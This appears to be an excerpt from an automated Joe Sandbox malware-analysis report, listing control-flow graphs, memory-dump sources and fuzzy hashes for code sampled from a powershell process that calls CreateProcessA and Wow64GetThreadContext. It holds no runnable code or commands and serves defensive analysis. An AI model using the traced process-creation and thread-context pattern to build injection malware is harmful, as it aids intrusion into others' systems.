                                                                          control_flow_graph 151 47268d5-4726975 154 4726977-4726981 151->154 155 47269ae-47269ce 151->155 154->155 156 4726983-4726985 154->156 162 47269d0-47269da 155->162 163 4726a07-4726a36 155->163 157 4726987-4726991 156->157 158 47269a8-47269ab 156->158 160 4726993 157->160 161 4726995-47269a4 157->161 158->155 160->161 161->161 164 47269a6 161->164 162->163 165 47269dc-47269de 162->165 171 4726a38-4726a42 163->171 172 4726a6f-4726b29 CreateProcessA 163->172 164->158 167 47269e0-47269ea 165->167 168 4726a01-4726a04 165->168 169 47269ee-47269fd 167->169 170 47269ec 167->170 168->163 169->169 173 47269ff 169->173 170->169 171->172 174 4726a44-4726a46 171->174 183 4726b32-4726bb8 172->183 184 4726b2b-4726b31 172->184 173->168 176 4726a48-4726a52 174->176 177 4726a69-4726a6c 174->177 178 4726a56-4726a65 176->178 179 4726a54 176->179 177->172 178->178 181 4726a67 178->181 179->178 181->177 194 4726bba-4726bbe 183->194 195 4726bc8-4726bcc 183->195 184->183 194->195 196 4726bc0-4726bc3 call 472045c 194->196 197 4726bce-4726bd2 195->197 198 4726bdc-4726be0 195->198 196->195 197->198 202 4726bd4-4726bd7 call 472045c 197->202 199 4726be2-4726be6 198->199 200 4726bf0-4726bf4 198->200 199->200 203 4726be8-4726beb call 472045c 199->203 204 4726c06-4726c0d 200->204 205 4726bf6-4726bfc 200->205 202->198 203->200 208 4726c24 204->208 209 4726c0f-4726c1e 204->209 205->204 211 4726c25 208->211 209->208 211->211
                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 04726B16
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2247593080.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_4720000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: c33c71e967db7de255ca9b40817e39cf0f60af4f6fa085059337c83450ece5e1
                                                                          • Instruction ID: 1b86af47a390e0da04216a5d87a7f102e46ab3eb182d602b6068bfdff79017c4
                                                                          • Opcode Fuzzy Hash: c33c71e967db7de255ca9b40817e39cf0f60af4f6fa085059337c83450ece5e1
                                                                          • Instruction Fuzzy Hash: 37A16971D006699FEB20DF68C941BEDBBB2BF44314F14816AE848A7340DB74A985CF91

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 212 47268e0-4726975 214 4726977-4726981 212->214 215 47269ae-47269ce 212->215 214->215 216 4726983-4726985 214->216 222 47269d0-47269da 215->222 223 4726a07-4726a36 215->223 217 4726987-4726991 216->217 218 47269a8-47269ab 216->218 220 4726993 217->220 221 4726995-47269a4 217->221 218->215 220->221 221->221 224 47269a6 221->224 222->223 225 47269dc-47269de 222->225 231 4726a38-4726a42 223->231 232 4726a6f-4726b29 CreateProcessA 223->232 224->218 227 47269e0-47269ea 225->227 228 4726a01-4726a04 225->228 229 47269ee-47269fd 227->229 230 47269ec 227->230 228->223 229->229 233 47269ff 229->233 230->229 231->232 234 4726a44-4726a46 231->234 243 4726b32-4726bb8 232->243 244 4726b2b-4726b31 232->244 233->228 236 4726a48-4726a52 234->236 237 4726a69-4726a6c 234->237 238 4726a56-4726a65 236->238 239 4726a54 236->239 237->232 238->238 241 4726a67 238->241 239->238 241->237 254 4726bba-4726bbe 243->254 255 4726bc8-4726bcc 243->255 244->243 254->255 256 4726bc0-4726bc3 call 472045c 254->256 257 4726bce-4726bd2 255->257 258 4726bdc-4726be0 255->258 256->255 257->258 262 4726bd4-4726bd7 call 472045c 257->262 259 4726be2-4726be6 258->259 260 4726bf0-4726bf4 258->260 259->260 263 4726be8-4726beb call 472045c 259->263 264 4726c06-4726c0d 260->264 265 4726bf6-4726bfc 260->265 262->258 263->260 268 4726c24 264->268 269 4726c0f-4726c1e 264->269 265->264 271 4726c25 268->271 269->268 271->271
                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 04726B16
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2247593080.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_4720000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: f1dc63344033aaac9b33ac6c53daf23855ce2f2b3df2643b4f2eb1ed18fec5b7
                                                                          • Instruction ID: 6594f5be278f12cb0f51f59c55d772a7f3b1489dbc50c3aedf96a4a14ec931d2
                                                                          • Opcode Fuzzy Hash: f1dc63344033aaac9b33ac6c53daf23855ce2f2b3df2643b4f2eb1ed18fec5b7
                                                                          • Instruction Fuzzy Hash: BF916971D00629DFEF24DF68C940BADBBB2BF48314F14856AE848A7350DB74A985CF91

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 272 47264b9-47264bd 273 47264e6-472650b 272->273 274 47264bf-47264e3 272->274 277 472651b-472654b Wow64GetThreadContext 273->277 278 472650d-4726519 273->278 274->273 280 4726554-4726584 277->280 281 472654d-4726553 277->281 278->277 281->280
                                                                          APIs
                                                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0472653E
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2247593080.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_4720000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: dc46fd455f0412a4d45734fadbd963f31f79d5f71364774bc514b6de2c532eb2
                                                                          • Instruction ID: b121ce32793fd969d30a9d7d7669aa928e934ac5ecee6a657d3a9e6d108a9f53
                                                                          • Opcode Fuzzy Hash: dc46fd455f0412a4d45734fadbd963f31f79d5f71364774bc514b6de2c532eb2
                                                                          • Instruction Fuzzy Hash: 0B216A719002098FDB10DFAAC5857EEBBF4EF49324F20842AD559A7344CB78A585CFA1

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 285 47264c0-472650b 288 472651b-472654b Wow64GetThreadContext 285->288 289 472650d-4726519 285->289 291 4726554-4726584 288->291 292 472654d-4726553 288->292 289->288 292->291
                                                                          APIs
                                                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0472653E
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2247593080.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_4720000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: b02936996ae48b7dfa1b365febb6aa925143ed87ba7f761359c717bcd247c037
                                                                          • Instruction ID: 530363954b0baf95ceb337b4f6302549a42d422698ec206b5bb835c5311125c2
                                                                          • Opcode Fuzzy Hash: b02936996ae48b7dfa1b365febb6aa925143ed87ba7f761359c717bcd247c037
                                                                          • Instruction Fuzzy Hash: 012118B19002098FDB10DFAAC5857EEBBF4EF48324F14842AD559A7344DB78A945CFA1

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 296 75c273f-75c2755 297 75c278e-75c2790 296->297 298 75c2757-75c2758 296->298 301 75c27a8-75c27b4 297->301 302 75c2792-75c2798 297->302 299 75c27ce-75c27d5 298->299 300 75c275a-75c2785 298->300 303 75c27ed-75c27f1 299->303 304 75c27d7-75c27dd 299->304 311 75c28c9-75c2915 300->311 312 75c278b 300->312 313 75c2876-75c2880 301->313 315 75c27ba-75c27bd 301->315 306 75c279c-75c27a6 302->306 307 75c279a 302->307 303->313 314 75c27f7-75c27f9 303->314 309 75c27df 304->309 310 75c27e1-75c27eb 304->310 306->301 307->301 309->303 310->303 326 75c291b-75c2920 311->326 327 75c2a66-75c2aac 311->327 312->297 316 75c288e-75c2894 313->316 317 75c2882-75c288b 313->317 314->313 318 75c27fb 314->318 315->313 320 75c27c3-75c27ca 315->320 322 75c289a-75c28a6 316->322 323 75c2896-75c2898 316->323 329 75c2802-75c2804 318->329 320->311 325 75c27d0-75c27d5 320->325 328 75c28a8-75c28c6 322->328 323->328 325->303 325->304 330 75c2938-75c293c 326->330 331 75c2922-75c2928 326->331 344 75c2d0a-75c2d3c 327->344 345 75c2ab2-75c2ab7 327->345 333 75c281c-75c2873 329->333 334 75c2806-75c280c 329->334 341 75c2a16-75c2a20 330->341 342 75c2942-75c2944 330->342 339 75c292c-75c2936 331->339 340 75c292a 331->340 335 75c280e 334->335 336 75c2810-75c2812 334->336 335->333 336->333 339->330 340->330 346 75c2a2e-75c2a34 341->346 347 75c2a22-75c2a2b 341->347 348 75c2946-75c2957 342->348 349 75c2987 342->349 365 75c2d3e-75c2d5b 344->365 366 75c2d75-75c2d7f 344->366 351 75c2acf-75c2ad3 345->351 352 75c2ab9-75c2abf 345->352 355 75c2a3a-75c2a46 346->355 356 75c2a36-75c2a38 346->356 348->327 374 75c295d-75c2965 348->374 353 75c2989-75c298b 349->353 362 75c2ad9-75c2add 351->362 363 75c2cb2-75c2cbc 351->363 358 75c2ac1 352->358 359 75c2ac3-75c2acd 352->359 353->341 360 75c2991-75c2993 353->360 361 75c2a48-75c2a63 355->361 356->361 358->351 359->351 367 75c29ad-75c29b9 360->367 368 75c2995-75c299b 360->368 372 75c2b1d 362->372 373 75c2adf-75c2af0 362->373 369 75c2cbe-75c2cc7 363->369 370 75c2cca-75c2cd0 363->370 400 75c2d5d-75c2d6f 365->400 401 75c2dc5-75c2dca 365->401 384 75c2d88-75c2d8e 366->384 385 75c2d81-75c2d85 366->385 396 75c29bb-75c29c1 367->396 397 75c29d1-75c2a13 367->397 379 75c299d 368->379 380 75c299f-75c29ab 368->380 381 75c2cd6-75c2ce2 370->381 382 75c2cd2-75c2cd4 370->382 378 75c2b1f-75c2b21 372->378 373->344 398 75c2af6-75c2afb 373->398 376 75c297d-75c2985 374->376 377 75c2967-75c296d 374->377 376->353 392 75c296f 377->392 393 75c2971-75c297b 377->393 378->363 389 75c2b27-75c2b2d 378->389 379->367 380->367 394 75c2ce4-75c2d07 381->394 382->394 390 75c2d94-75c2da0 384->390 391 75c2d90-75c2d92 384->391 389->363 402 75c2b33-75c2b40 389->402 395 75c2da2-75c2dc2 390->395 391->395 392->376 393->376 406 75c29c5-75c29c7 396->406 407 75c29c3 396->407 408 75c2afd-75c2b03 398->408 409 75c2b13-75c2b1b 398->409 400->366 401->400 411 75c2bd6-75c2c15 402->411 412 75c2b46-75c2b4b 402->412 406->397 407->397 415 75c2b05 408->415 416 75c2b07-75c2b11 408->416 409->378 439 75c2c1c-75c2c20 411->439 417 75c2b4d-75c2b53 412->417 418 75c2b63-75c2b79 412->418 415->409 416->409 423 75c2b55 417->423 424 75c2b57-75c2b61 417->424 418->411 430 75c2b7b-75c2b9b 418->430 423->418 424->418 433 75c2b9d-75c2ba3 430->433 434 75c2bb5-75c2bd4 430->434 436 75c2ba5 433->436 437 75c2ba7-75c2bb3 433->437 434->439 436->434 437->434 442 75c2c22-75c2c2b 439->442 443 75c2c43 439->443 444 75c2c2d-75c2c30 442->444 445 75c2c32-75c2c3f 442->445 446 75c2c46-75c2c52 443->446 447 75c2c41 444->447 445->447 449 75c2c58-75c2caf 446->449 447->446
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2285497445.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_75c0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q
                                                                          • API String ID: 0-1259897404
                                                                          • Opcode ID: e3342ba03eb45414a27eb86a68e3a5bea62f06ce33f3cc78e46f66fdf09435b6
                                                                          • Instruction ID: 6bea60686baa3b26e82a9e6c6efd063a9d0efaa61df44c140b46d7c4aa885cbe
                                                                          • Opcode Fuzzy Hash: e3342ba03eb45414a27eb86a68e3a5bea62f06ce33f3cc78e46f66fdf09435b6
                                                                          • Instruction Fuzzy Hash: E421A1B1A053428FDB25CBA59A81BE6BBF1BF52650F0980AFD408DB151D334C845CBA2
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2243098193.0000000002E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E6D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2e6d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8de872bf5130bac926e8e2820dc6ecb3b42950cc877b99523613d6d677edbae8
                                                                          • Instruction ID: 941da2f0c8b4f8746d71d0657fd111bd1682a9df583979ff8851996dbd6ec3bc
                                                                          • Opcode Fuzzy Hash: 8de872bf5130bac926e8e2820dc6ecb3b42950cc877b99523613d6d677edbae8
                                                                          • Instruction Fuzzy Hash: D601806104E3C09ED7128B258C94762BFB4DF43224F1DC0DBD8888F1A7C2694849CB72
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2243098193.0000000002E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E6D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_2e6d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b3cee868071c7558936e60c52be2f1566eb70d31b3567fd090d98dfbae523b14
                                                                          • Instruction ID: ec46d907c90fc530dc8cb7a1a855b64d27fb96d9053cf55214e106cc5da10c4c
                                                                          • Opcode Fuzzy Hash: b3cee868071c7558936e60c52be2f1566eb70d31b3567fd090d98dfbae523b14
                                                                          • Instruction Fuzzy Hash: EE012B31284340DAD7608A15CD88B77FF9CEF853B8F18C42AED484B246C3799845CAB1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2285497445.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_75c0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q$4']q$$]q$$]q
                                                                          • API String ID: 0-978391646
                                                                          • Opcode ID: 78d647ad2e3c782fc00e78c673c86ccf33abe20c04224078fef39736c8b16f61
                                                                          • Instruction ID: 810f5d6e35b2ae34d818208c3ddd3f93e17550a4b97b40192a331cfad96bf907
                                                                          • Opcode Fuzzy Hash: 78d647ad2e3c782fc00e78c673c86ccf33abe20c04224078fef39736c8b16f61
                                                                          • Instruction Fuzzy Hash: D501F761B4D395CFC72B52BC29202A63FF6AFC395072A44EBC045CB296C9294C49C7A7